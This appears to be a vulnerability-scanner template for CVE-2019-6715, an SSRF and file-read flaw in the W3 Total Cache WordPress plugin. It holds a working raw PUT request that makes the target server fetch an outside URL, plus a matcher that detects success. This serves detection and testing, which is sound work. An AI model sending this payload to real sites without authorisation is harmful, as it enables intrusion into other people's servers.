30 lines
926 B
YAML
30 lines
926 B
YAML
id: CVE-2019-6715
|
|
|
|
info:
|
|
name: CVE-2019-6715
|
|
author: randomrobbie
|
|
severity: high
|
|
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
|
|
tags: cve,cve2019,wordpress,wp-plugin,ssrf
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2019-6715
|
|
reference:
|
|
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
|
|
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "TmVzc3VzQ29kZUV4ZWNUZXN0"
|
|
part: body |